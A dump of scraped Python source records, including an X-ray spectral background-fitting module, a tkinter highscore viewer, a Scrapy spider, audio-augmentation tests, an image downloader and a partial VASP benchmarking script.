fit')\n print(' ')\n else:\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))) + pnbrsp(galabs * (pnbkgapec + pnbkgpl) + pnbkglcapec))\n print(' ')\n print('PN background model set up')\n print(' ')\n return pnscale * (pnbunitrsp(pncons * (pnspline1 * pnexpdec + pnsmedge1 * pnsmedge2 * (pnspline2 * pnbkpl + pngau1 + pngau2 + pngau3 + pngau4 + pngau5 + pngau6 + pngau7 + pngau8 + pngau9 + pngau10 + pngau11))) + pnbrsp(galabs * (pnapec + pnpnexpl) + pnlcapec))\n\n\ndef get_mos_bkg_model(i, galabs, fit=False):\n if get_rmf(i).energ_lo[0] == 0:\n get_rmf(i).energ_lo[0] = 0.001\n else:\n if get_arf(i).energ_lo[0] == 0:\n get_arf(i).energ_lo[0] = 0.001\n mosbrsp = get_response(i, bkg_id=1)\n mosscale = get_bkg_scale(i)\n dia_mos_rmf = get_embedded_file('mos_dia.rmf')\n dia_mos_arf = get_embedded_file('mos_dia.arf')\n copy_data(i, 1002)\n load_bkg_rmf(1002, dia_mos_rmf)\n load_bkg_arf(1002, dia_mos_arf)\n mosbunitrsp = get_response(1002, bkg_id=1)\n delete_data(1002)\n moscenters = [\n 1.486, 1.487, 1.74, 5.41, 5.895, 6.42, 9.71]\n moslinewidth = [0.0384602, 0.165816, 0.0354985, 0.0977018, 0.0745076, 0.0742365, 0.0904855]\n moslinenorm = [0.00993119, 0.00167028, 0.00175461, 0.000286358, 0.000207525, 0.000307555, 0.000458115]\n mos = 'mos%s' % i\n mosbkgcons, mosbkgsmedge, mosbkgspline, mosbkgbknpl, mosbkgline1, mosbkgline2, mosbkgline3, mosbkgline4, mosbkgline5, mosbkgline6, mosbkgline7, mosbkgpl, mosbkgapec, mosbkglcapec = (\n xsconstant(mos + 'cons'), xssmedge(mos + 'smedge'), xsspline(mos + 'spline'), xsbknpower(mos + 'bknpl'), xsgaussian(mos + 'gau1'), xsgaussian(mos + 'gau2'), xsgaussian(mos + 'gau3'), xsgaussian(mos + 'gau4'), xsgaussian(mos + 'gau5'), xsgaussian(mos + 'gau6'), xsgaussian(mos + 'gau7'), xspowerlaw(mos + 'expl'), xsapec(mos + 'apec'), xsapec(mos + 'lcapec'))\n moslines = [\n mosbkgline1, mosbkgline2, mosbkgline3, mosbkgline4, mosbkgline5, mosbkgline6, mosbkgline7]\n mos_bkg = 'mos_bkg_model'\n mos_bkg = mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * (mosbkgpl + mosbkgapec) + mosbkglcapec)\n for l, c in zip(moslines, moscenters):\n l.LineE = c\n l.LineE.min = c - 0.05\n l.LineE.max = c + 0.05\n\n for l, s in zip(moslines, moslinewidth):\n l.Sigma = s\n l.Sigma.min = 0.0001\n l.Sigma.max = 0.2\n\n mosbkgline1.Sigma.min = 0.0001\n mosbkgline1.Sigma.max = 0.1\n for l, n in zip(moslines, moslinenorm):\n l.norm = n\n l.norm.min = 1e-10\n l.norm.max = 10000000000.0\n\n mosbkgcons.factor = 1.0\n mosbkgcons.factor.freeze()\n mosbkgsmedge.edgeE = 0.538408\n mosbkgsmedge.edgeE.freeze()\n mosbkgsmedge.MaxTau = 0.246633\n mosbkgsmedge.MaxTau.min = 0.0\n mosbkgsmedge.MaxTau.max = 10.0\n mosbkgsmedge.index = -2.67\n mosbkgsmedge.index.freeze()\n mosbkgsmedge.width = 0.01\n mosbkgsmedge.width.min = 0.01\n mosbkgsmedge.width.max = 100.0\n mosbkgspline.Estart = 3.08175\n mosbkgspline.Ystart = 1.00984\n mosbkgspline.Yend = 1.99144\n mosbkgspline.YPstart = -0.0290195\n mosbkgspline.YPend = 0.0549102\n mosbkgspline.Estart.freeze()\n mosbkgspline.Ystart.freeze()\n mosbkgspline.Yend.freeze()\n mosbkgspline.YPstart.freeze()\n mosbkgspline.YPend.freeze()\n mosbkgspline.Eend = 13.6492\n mosbkgspline.Eend.min = 0\n mosbkgspline.Eend.max = 100\n mosbkgbknpl.PhoIndx1 = 1.48636\n mosbkgbknpl.PhoIndx1.min = -2\n mosbkgbknpl.PhoIndx1.max = 9\n mosbkgbknpl.BreakE = 0.415173\n mosbkgbknpl.PhoIndx2 = 0.315615\n mosbkgbknpl.BreakE.freeze()\n mosbkgbknpl.PhoIndx2.freeze()\n mosbkgbknpl.norm = 0.00290071\n mosbkgbknpl.norm.min = 1e-10\n mosbkgbknpl.norm.max = 10000000000.0\n mosbkgpl.PhoIndex = 1.46\n mosbkgpl.PhoIndex.freeze()\n mosbkgpl.norm = 0.000458115\n mosbkgpl.norm.min = 1e-10\n mosbkgpl.norm.max = 10000000000.0\n mosbkgapec.kT = 0.286928\n mosbkgapec.kT.min = 0.008\n mosbkgapec.kT.max = 64\n mosbkgapec.Abundanc = 1.0\n mosbkgapec.Abundanc.freeze()\n mosbkgapec.Redshift = 0.0\n mosbkgapec.Redshift.freeze()\n mosbkgapec.norm = 5.5841e-05\n mosbkgapec.norm.min = 1e-10\n mosbkgapec.norm.max = 10000000000.0\n mosbkglcapec.kT = 0.1\n mosbkglcapec.kT.freeze()\n mosbkglcapec.Abundanc = 1.0\n mosbkglcapec.Abundanc.freeze()\n mosbkglcapec.Redshift = 0.0\n mosbkglcapec.Redshift.freeze()\n mosbkglcapec.norm = 3.89164e-05\n mosbkglcapec.norm.min = 1e-10\n mosbkglcapec.norm.max = 10000000000.0\n if fit:\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl))\n print('Fitting (1/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline2))\n print('Fitting (2/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline2 + mosbkgline3))\n print('Fitting (3/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3))\n print('Fitting (4/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7))\n print('Fitting (5/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * mosbkgapec))\n print('Fitting (6/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * (mosbkgapec + mosbkgpl)))\n print('Fitting (7/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * (mosbkgapec + mosbkgpl) + mosbkglcapec))\n print('Fitting (8/8)...')\n fit_bkg(i)\n freeze(mosbkgcons, mosbkgsmedge, mosbkgspline, mosbkgbknpl, mosbkgline1, mosbkgline2, mosbkgline3, mosbkgline4, mosbkgline5, mosbkgline6, mosbkgline7, mosbkgpl, mosbkgapec, mosbkglcapec)\n print(' ')\n print('MOS background model set up and fitted')\n print('Please double-check that it is a good fit')\n print(' ')\n else:\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * (mosbkgapec + mosbkgpl) + mosbkglcapec))\n print(' ')\n print('MOS background model set up')\n print(' ')\n return mosscale * (mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * (mosbkgapec + mosbkgpl) + mosbkglcapec))\n\n\ndef get_mos_bkg_model_cached(i, galabs):\n filename = get_bkg(i).name + '.bkgpars'\n if os.path.exists(filename):\n bkgmodel = get_mos_bkg_model(i, galabs, fit=False)\n for p, v in zip(bkgmodel.pars, numpy.loadtxt(filename)):\n p.val = v\n\n else:\n bkgmodel = get_mos_bkg_model(i, galabs, fit=True)\n numpy.savetxt(filename, [p.val for p in bkgmodel.pars])\n for p in bkgmodel.pars:\n p.freeze()\n\n return bkgmodel\n\n\ndef get_pn_bkg_model_cached(i, galabs):\n filename = get_bkg(i).name + '.bkgpars'\n if os.path.exists(filename):\n bkgmodel = get_pn_bkg_model(i, galabs, fit=False)\n for p, v in zip(bkgmodel.pars, numpy.loadtxt(filename)):\n p.val = v\n\n else:\n bkgmodel = get_pn_bkg_model(i, galabs, fit=True)\n numpy.savetxt(filename, [p.val for p in bkgmodel.pars])\n for p in bkgmodel.pars:\n p.freeze()\n\n return bkgmodel","sub_path":"pycfiles/bxa-3.3.1-py3.6/xmm.cpython-36.py","file_name":"xmm.cpython-36.py","file_ext":"py","file_size_in_byte":19321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"461642281","text":"import tkinter as tk\nfrom tkinter import messagebox\nimport csv, sys\n\ndef save_highscore(name, score, diff):\n print('SAVING HIGHSCORE')\n f = open('highscores.csv', 'a')\n writer = csv.writer(f, delimiter=',', lineterminator='\\n')\n writer.writerow([name, score, diff])\n f.close()\n\ndef load_csv_data():\n f = open('highscores.csv')\n reader = csv.reader(f)\n tempList = []\n for row in reader:\n tempList.append(row)\n f.close()\n return tempList\n \nclass HighscoreWindow():\n def __init__(self, controlParent):\n self.master = tk.Tk()\n self.master.config(bg = \"white\")\n self.master.title(\"Highscores\")\n self.master.call('wm', 'attributes', '.', '-topmost', '1') #Keep it on top of ERYTING\n self.master.protocol(\"WM_DELETE_WINDOW\", self.destroy)\n self.controlParent = controlParent\n self.highscoreData = load_csv_data()\n self.radioFrame = tk.Frame(self.master)\n self.HighscoreFrame = tk.Frame(self.master)\n self.radioFrame.grid()\n self.HighscoreFrame.grid()\n\n self.diffVar = tk.StringVar()\n self.diffVar.set(\"easy\") # initialize\n\n MODES = [\n (\"Easy\", \"easy\", \"#ADD633\"),\n (\"Medium\", \"medium\", \"#6699FF\"),\n (\"Hard\", \"hard\", \"#B24C32\"),\n (\"Custom\", \"custom\", \"#CC33FF\"),\n ]\n\n self.diffVar = tk.StringVar(self.master)\n self.diffVar.set(\"easy\") # initialize\n\n for text, mode, colour in MODES:\n self.b = tk.Radiobutton(self.radioFrame,\n text = text,\n variable = self.diffVar,\n value = mode,\n indicatoron = 0,\n bg = '#DDDDDD',\n bd = 0,\n width = 11,\n selectcolor = colour,\n relief = tk.SUNKEN,\n command = self.refresh)\n self.b.pack(anchor='w', side = \"left\")\n\n \n self.indexTable = tk.Listbox(master = self.HighscoreFrame,\n disabledforeground = \"black\",\n setgrid = 5,\n exportselection = 0,\n bd = 0,\n width = 2,\n font = \"Calibri 14\")\n self.indexTable.grid(row = 0, column = 0)\n\n self.nameTable = tk.Listbox(master = self.HighscoreFrame,\n disabledforeground = \"black\",\n setgrid = 5,\n exportselection = 0,\n bd = 0,\n width = 15,\n font = \"Calibri 14\")\n self.nameTable.grid(row = 0, column = 1)\n\n self.scoreTable = tk.Listbox(master = self.HighscoreFrame,\n disabledforeground = \"black\",\n exportselection = 0,\n bd = 0,\n width = 6,\n font = \"Calibri 14\")\n self.scoreTable.grid(row = 0, column = 2)\n\n self.diffTable = tk.Listbox(master = self.HighscoreFrame,\n disabledforeground = \"black\",\n exportselection = 0,\n bd = 0,\n width = 8,\n font = 'Calibri 14')\n self.diffTable.grid(row = 0, column = 3)\n\n self.tables = [self.indexTable, self.nameTable, self.scoreTable, self.diffTable]\n\n self.load()\n\n def load(self):\n self.highscoreData = load_csv_data()\n data = sorted(self.highscoreData, key = lambda x:x[1], reverse = True)\n data = [x for x in data if x[2] == self.diffVar.get()]\n if len(data) != 0:\n for index in range(10):\n try:\n name, score, diff = data[index]\n self.add_highscore(index+1, name, score, diff)\n except IndexError:\n break\n\n for box in self.tables:\n box.itemconfig(0, bg = \"red\")\n \n for box in self.tables:\n box.config(state = tk.DISABLED)\n\n def clear(self):\n for table in self.tables:\n table.delete(0, tk.END)\n\n def refresh(self):\n for box in self.tables:\n box.config(state = tk.NORMAL)\n self.clear()\n self.load()\n\n def add_highscore(self, index, name, score, diff):\n self.indexTable.insert(tk.END, str(index)+'.')\n self.nameTable.insert(tk.END, name)\n self.scoreTable.insert(tk.END, score)\n self.diffTable.insert(tk.END, diff)\n\n def destroy(self):\n self.controlParent.highscoreWindow = None\n self.master.destroy()\n\nif __name__ == \"__main__\":\n window = HighscoreWindow(None)\n\n","sub_path":"highscoreWidget.py","file_name":"highscoreWidget.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"173198697","text":"#\n# @lc app=leetcode id=414 lang=python3\n#\n# [414] Third Maximum Number\n#\n\n# @lc code=start\nclass Solution:\n from random import randint\n def thirdMax(self, nums: List[int]) -> int:\n nums = list(set(nums))\n if len(nums) < 3:\n return max(nums)\n \n def get_kth_rank(nums, k):\n \"\"\"0-indexed (ranks are from 0 (min) to len(nums) - 1 (max).)\"\"\"\n pivot = nums[randint(0, len(nums) - 1)]\n left, right = [], []\n \n for x in nums:\n if x < pivot:\n left.append(x)\n if x > pivot:\n right.append(x)\n \n if len(left) == k:\n return pivot\n elif len(left) < k:\n return get_kth_rank(right, k - (len(left) + 1))\n else:\n return get_kth_rank(left, k)\n \n return get_kth_rank(nums, len(nums) - 3)\n\n \n# @lc code=end\n\n","sub_path":"code/414.third-maximum-number.py","file_name":"414.third-maximum-number.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"580065317","text":"def by_state(str):\n d = {'AZ': 'Arizona',\n 'CA': 'California',\n 'ID': 'Idaho',\n 'IN': 'Indiana',\n 'MA': 'Massachusetts',\n 'OK': 'Oklahoma',\n 'PA': 'Pennsylvania',\n 'VA': 'Virginia'}\n a = str.split(\"\\n\")\n b = {}\n for x in a:\n v = x[-2:]\n if v not in b:\n b[v] = []\n b[v].append(x[:-3].split(\", \"))\n for k in b:\n b[k].sort()\n b[k] = \"\\r\\n\".join([\"..... \" + \" \".join(arr + [d[k]]) for arr in b[k]])\n res = []\n for k in sorted(b.keys()):\n res.append(d[k] + \"\\r\\n\" + b[k])\n return \"\\r\\n \".join(res)\n\n\ns = \"\"\"Burt Lane, 90 Pen Avenue, Westbury AZ\nRichard Stall, 334 Shore Parkway, Mountain View CA\nSim Burton, 10 Abbe Road, Richmond ID\nAma Zon, 5AA Clear Bd, Mountain View CA\nBill Joke, 1C Hilary Main Street, Plymouth MA\nAntony None, 12 Loan Alley, Mountain View CA\nFanny Hem, 8A River Street, Beaver Falls PA\nMac Bud, 11354 East Bridge Road, Mountain View CA\nChris Maker, 420 Land Road, Mountain View CA\"\"\"\nprint(by_state(s))\n","sub_path":"codewar/2022/6/Address_Book_by_State.py","file_name":"Address_Book_by_State.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222037110","text":"import scrapy\n\nclass GsocSpider(scrapy.Spider):\n name = 'gsoc'\n\n start_urls = [\n 'https://summerofcode.withgoogle.com/archive/2016/organizations/'\n ]\n\n def parse(self,response):\n base_link = \"https://summerofcode.withgoogle.com\"\n for org in response.xpath(\"//li[@class = 'organization-card__container']\"):\n link = org.xpath(\".//a/@href\").extract_first()\n org_link = base_link + link\n org_name = org.xpath(\".//h4/text()\").extract_first()\n org_image = org.xpath(\".//org-logo/@data\").extract_first()\n yield {\n 'link' : org_link,\n 'name' : org_name,\n 'image': org_image\n }","sub_path":"gsoc_organizations/spiders/gsoc.py","file_name":"gsoc.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"201697221","text":"import unittest\n\nimport numpy as np\n\nfrom audiomentations.augmentations.transforms import Trim\nfrom audiomentations.core.composition import Compose\n\n\nclass TestTrim(unittest.TestCase):\n def test_trim(self):\n sample_len = 1024\n samples1 = np.zeros((sample_len,), dtype=np.float32)\n samples2 = np.random.normal(0, 1, size=sample_len).astype(np.float32)\n sample_rate = 16000\n augmenter = Compose([Trim(top_db=20, p=1.0)])\n samples_in = np.hstack((samples1, samples2))\n self.assertEqual(len(samples_in), sample_len * 2)\n samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)\n\n self.assertEqual(samples_out.dtype, np.float32)\n self.assertLess(len(samples_out), sample_len * 2)\n","sub_path":"tests/test_trim.py","file_name":"test_trim.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532038283","text":"import numpy as np\nimport time\nfrom mot_func.mot_search_association import mot_search_association\nfrom mot_func.mot_return_ass_idx import mot_return_ass_idx\nfrom mot_func.mot_tracklets_components_setup import mot_tracklets_components_setup\ndef MOT_Initialization_Tracklets(rgbimg=None,Trk=None,detections=None,param=None,Y_set=None,fr=None,*args,**kwargs):\n print(\"MOT_Initialization_Tracklets.py start\")\n fr = fr\n new_thr=param.new_thr\n for i in range(0,len(Y_set[fr-1].child)):#backup to init the initial tracklet\n prt_idx=Y_set[fr-1].child[i]\n if len(prt_idx) <=1:\n child_idx=mot_search_association(Y_set,fr-1,prt_idx)#child_idx:the init tracklet\n ass_idx=mot_return_ass_idx(child_idx,prt_idx,i,fr-1)\n else:\n child_idx=[]\n tmp_ass_idx=[]\n ass_ln=[]\n for j in range(0,len(prt_idx)):\n child_idx[j]=mot_search_association(Y_set,fr-1,prt_idx(j))\n tmp_ass_idx[j]=mot_return_ass_idx(child_idx[j],prt_idx(j),i,fr-1)\n ass_ln[j]=len(find(tmp_ass_idx[j] != 0))\n __,pid=max(ass_ln)\n ass_idx=tmp_ass_idx[pid]\n if len(np.where(np.array(ass_idx) != -1)[0]) >= new_thr:#if the length of init tracketlet >4 then generate the tracklet\n time1 = time.time()\n Trk,param=mot_tracklets_components_setup(rgbimg,Trk,detections,fr,ass_idx,param,None,True)\n time2 = time.time()\n #print(\"after tracklets generate\",time2-time1)\n for h in range(0,len(np.where(ass_idx != 0))):\n Y_set[fr-1 - h].child[ass_idx[-1 - h][0]]=0\n \n print(\"MOT_Initialization_Tracklets over\")\n return Trk,param,Y_set\n \nif __name__ == '__main__':\n pass\n \n","sub_path":"mot_func/MOT_Initialization_Tracklets.py","file_name":"MOT_Initialization_Tracklets.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"490950648","text":"import base64\nimport functools\nimport getpass\nimport hashlib\nimport json\nimport multiprocessing\nimport pathlib\nimport shutil\n\nimport lz4.frame\nimport requests\nimport tensorflow as tf\nimport tqdm\nfrom PIL import Image\n\nfrom utils.model_logger import logger\n\n\ndef get_session():\n username = input(\"Username:\")\n password = getpass.getpass()\n\n s = requests.Session()\n r = s.get(\"http://13.125.1.208/book/login/?next=/book\")\n s.post(\n \"http://13.125.1.208/book/login/?next=/book\",\n data={\n \"password\": password,\n \"username\": username,\n \"csrfmiddlewaretoken\": r.cookies.get(\"csrftoken\"),\n },\n )\n return s\n\n\ndef save_image(url, directory, filename, file_type):\n directory_path = pathlib.Path(directory)\n file_path = directory_path / filename\n new_label = directory_path.parts[-1]\n\n directory_path.mkdir(exist_ok=True, parents=True)\n\n if file_type:\n if filename in file_type:\n label = file_type[filename][0]\n\n if label != new_label:\n prev_path = directory_path.parents[0] / label / filename\n logger.debug(\"Move from {} to {}\".format(prev_path, file_path))\n try:\n shutil.move(prev_path, file_path)\n except:\n pass\n return\n\n if file_path.exists():\n return\n\n try:\n r = requests.get(url, stream=True)\n except requests.exceptions.ConnectionError:\n print(\"Skipping {}\".format(url))\n return\n\n if r.status_code == 200:\n with open(file_path, \"wb\") as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n\ndef parse(data, data_type=\"pokemon_yes_no\", black_list=None, file_type=None):\n url = data[\"fields\"][\"url\"]\n filename = url.split(\"/\")[-1]\n\n url_hash = int(hashlib.sha1(url.encode(\"utf-8\")).hexdigest(), 16) % 100\n\n if data_type == \"pokemon_yes_no\":\n label = data[\"fields\"][\"classified\"]\n elif data_type == \"pokemon_classification\":\n label = data[\"fields\"][\"original_label\"]\n else:\n label = data[\"fields\"][\"selected\"]\n\n if url_hash < 90:\n target_path = \"data/{}/train/{}\".format(data_type, label)\n else:\n target_path = \"data/{}/validate/{}\".format(data_type, label)\n\n if black_list and target_path + \"/\" + filename in black_list:\n print(\"Skipping {} since it is listed in blacklist\".format(url))\n return\n\n save_image(url, target_path, filename, file_type)\n\n\ndef validate_image(data_type=\"pokemon_yes_no\"):\n print(\"Validate Images\")\n if pathlib.Path(\"blacklist.json\").exists():\n with open(\"blacklist.json\", \"r\") as f:\n ignore_list = json.load(f)\n else:\n ignore_list = []\n for file_path in pathlib.Path(\"data/\" + data_type + \"/\").glob(\"**/*\"):\n if file_path.is_file():\n str_file_path = str(file_path)\n normalized_str_file_path = str_file_path.replace(\"\\\\\", \"/\")\n if normalized_str_file_path in ignore_list:\n print(\"Skipping {}\".format(file_path))\n file_path.unlink()\n continue\n\n img = tf.io.read_file(str_file_path)\n try:\n tf.image.decode_jpeg(img, channels=3)\n except Exception:\n print(\"Converting\", str_file_path)\n\n try:\n im = Image.open(str_file_path)\n try:\n im.save(str_file_path, \"JPEG\")\n\n except Exception:\n im.close()\n print(\"Converting Failed add to ignore list\")\n file_path.unlink()\n\n if normalized_str_file_path not in ignore_list:\n ignore_list.append(normalized_str_file_path)\n except Exception:\n file_path.unlink()\n\n if normalized_str_file_path not in ignore_list:\n ignore_list.append(normalized_str_file_path)\n\n with open(\"blacklist.json\", \"w\") as w:\n w.write(json.dumps(ignore_list))\n\n\ndef download_pokemon(session, file_type, label=\"yes\"):\n download(\n url=\"http://13.125.1.208/book/pokemon_export/\",\n file_type=file_type,\n label=label,\n session=session,\n )\n\n\ndef download_people(session, file_type, label=\"True\"):\n download(\n url=\"http://13.125.1.208/book/people_result/download/\",\n file_type=file_type,\n label=label,\n data_type=\"people\",\n session=session,\n )\n\n\ndef download(url, session, label=\"True\", data_type=\"pokemon_yes_no\", file_type=None):\n page = 1\n\n black_list_path = pathlib.Path(\"blacklist.json\")\n black_list = None\n if black_list_path.exists():\n with open(black_list_path) as f:\n black_list = json.load(f)\n black_list = set(black_list)\n\n parse_function = functools.partial(\n parse, data_type=data_type, black_list=black_list, file_type=file_type\n )\n with multiprocessing.Pool(5) as pool:\n while True:\n request_url = url + label + \"/\" + str(page)\n results = session.get(url + label + \"/\" + str(page))\n print(request_url)\n\n pickled = base64.b85decode(results.text)\n\n decompressed = lz4.frame.decompress(pickled)\n\n with open(\"./zip.txt\", \"w\") as w:\n w.write(results.text)\n\n data = decompressed.decode(\"utf-8\")\n with open(\"./result.txt\", \"w\") as w:\n w.write(data)\n\n data_json = json.loads(data)\n image_list = data_json[\"image_list\"]\n\n with tqdm.tqdm(total=len(image_list)) as pbar:\n for i, _ in enumerate(pool.imap_unordered(parse_function, image_list)):\n pbar.update()\n page += 1\n if not data_json[\"has_next\"]:\n break\n","sub_path":"src/train/data_downloader.py","file_name":"data_downloader.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"566885847","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.4-x86_64/egg/trachet/controller.py\n# Compiled at: 2014-07-01 10:29:06\n_DEBUG_MODE_NONE = 0\n_DEBUG_MODE_NORMAL_STEP = 1\n_DEBUG_MODE_FUZZY_STEP = 2\n_DEBUG_MODE_STOP = 3\nimport constant, time\n\nclass ActionController(object):\n __mode = _DEBUG_MODE_NONE\n __actions = None\n __accel = 1.0\n __lastcalltime = 0\n\n def __init__(self, tty):\n self.__mode = _DEBUG_MODE_NONE\n self.__actions = []\n self.__tty = tty\n self.__accel = 1.0\n\n def is_suspended(self):\n return self.__mode != _DEBUG_MODE_NONE\n\n def append(self, action):\n return self.__actions.append(action)\n\n def resume(self):\n self.__mode = _DEBUG_MODE_NONE\n\n def set_normal_step(self):\n self.__mode = _DEBUG_MODE_NORMAL_STEP\n\n def set_fuzzy_step(self):\n self.__mode = _DEBUG_MODE_FUZZY_STEP\n\n def set_break(self):\n self.__mode = _DEBUG_MODE_STOP\n\n def _get_repeat_count(self):\n now = time.time()\n if now - self.__lastcalltime < 0.1:\n self.__accel *= 1.2\n else:\n self.__accel = 1\n self.__lastcalltime = now\n repeat = max(1, self.__accel)\n return repeat\n\n def tick(self):\n if self.__mode == _DEBUG_MODE_NONE:\n while self.__actions:\n action = self.__actions.pop(0)\n result = action()\n\n elif self.__mode == _DEBUG_MODE_NORMAL_STEP:\n self.__mode = _DEBUG_MODE_STOP\n repeat = self._get_repeat_count()\n while repeat > 0 and self.__actions:\n repeat -= 1\n action = self.__actions.pop(0)\n result = action()\n\n elif self.__mode == _DEBUG_MODE_FUZZY_STEP:\n self.__mode = _DEBUG_MODE_STOP\n repeat = self._get_repeat_count()\n while repeat > 0:\n repeat -= 1\n while self.__actions:\n action = self.__actions.pop(0)\n result = action()\n if result != constant.SEQ_TYPE_CHAR:\n break\n else:\n return\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()","sub_path":"pycfiles/trachet-1.0.9-py2.6/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198163241","text":"import serial\nimport pynmea2\nimport numpy as np\nser = serial.Serial('/dev/ttyUSB0',baudrate=4800)\nser.flushInput()\nwhile True:\n a= ser.readline()\n a = a.decode(\"utf-8\")\n nmeaobj = np.array(a.split(\",\"))\n if nmeaobj[0] == \"$GPRMC\":\n print(\"Latitude = \",str(nmeaobj[3]),str(nmeaobj[4]))\n print(\"Longitude = \",str(nmeaobj[5]),str(nmeaobj[6]))","sub_path":"gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"389526212","text":"import pymatgen.io.vasp.inputs as pmg\nimport subprocess\nimport os\nimport fileinput\nfrom utilities import *\nfrom benchmark_runner import *\n\ndef read_and_choose_test_data(INCAR=\"INCAR\",KPOINTS=\"KPOINTS\",POSCAR=\"POSCAR\",POTCAR=\"POTCAR\",submission=\"submit.pbs\",name=\"calculation\"):\n\t\"\"\"read_and_choose_test_data: Given file names for INCAR, KPOINTS, POSCAR, POTCAR, and a submission script, as well as a name for the calculation folder,\n\treads each file into a corresponding pymatgen vasp input object. Then it chooses test data for default benchmarking calculations,\n\tcreates calculation folders, and returns a list of folder names for testing ENCUT values, a list of folder names for testing ka values,\n\ta list of encut values to be tested, and a list of ka values to be tested.\"\"\"\n\tprint(\"fetching files\")\n\tincar = pmg.Incar.from_file(INCAR)\n\tkpoints = pmg.Kpoints.from_file(KPOINTS)\n\tposcar = pmg.Poscar.from_file(POSCAR)\n\tpotcar = pmg.Potcar.from_file(POTCAR)\n\tsubmit = open(submission, \"r\").read()\n\treturn choose_test_data(incar,kpoints,poscar,potcar,submit,name)\n\ndef choose_test_data(incar,kpoints,poscar,potcar,submit,name):\n\t\"\"\"choose_test_data: Given Incar, Kpoints, Poscar, and Potcar objects from pymatgen.io.vasp.inputs, as well as a submission script represented\n\tas a string and a name for the folder in which to deposit calculation folders, chooses values of encut and ka values to test\n\tand makes folders with vasp input files for each set of values to be tested inside a new main calculatuon folder.\n\tReturns a list of folder names for testing ENCUT values, a list of folder names for testing ka values, a list of ENCUT values \n\tto be tested, and a list of ka values to be tested.\"\"\"\n\tsubprocess.call([\"mkdir\", name])\n\tcurrent_dir = os.getcwd()\n\tos.chdir(current_dir+\"/\"+name)\n\tprint(\"generating data combinations\")\n\tka_folder_list = []\n\tencut_folder_list = []\n\tencut_list = [150,200,250,300,350,400,450,500,550,600,650,700,750]\n\tlattice = poscar.structure.lattice\n\tk_list, k_mul_a_lst = make_kpoint_sets(lattice.a, 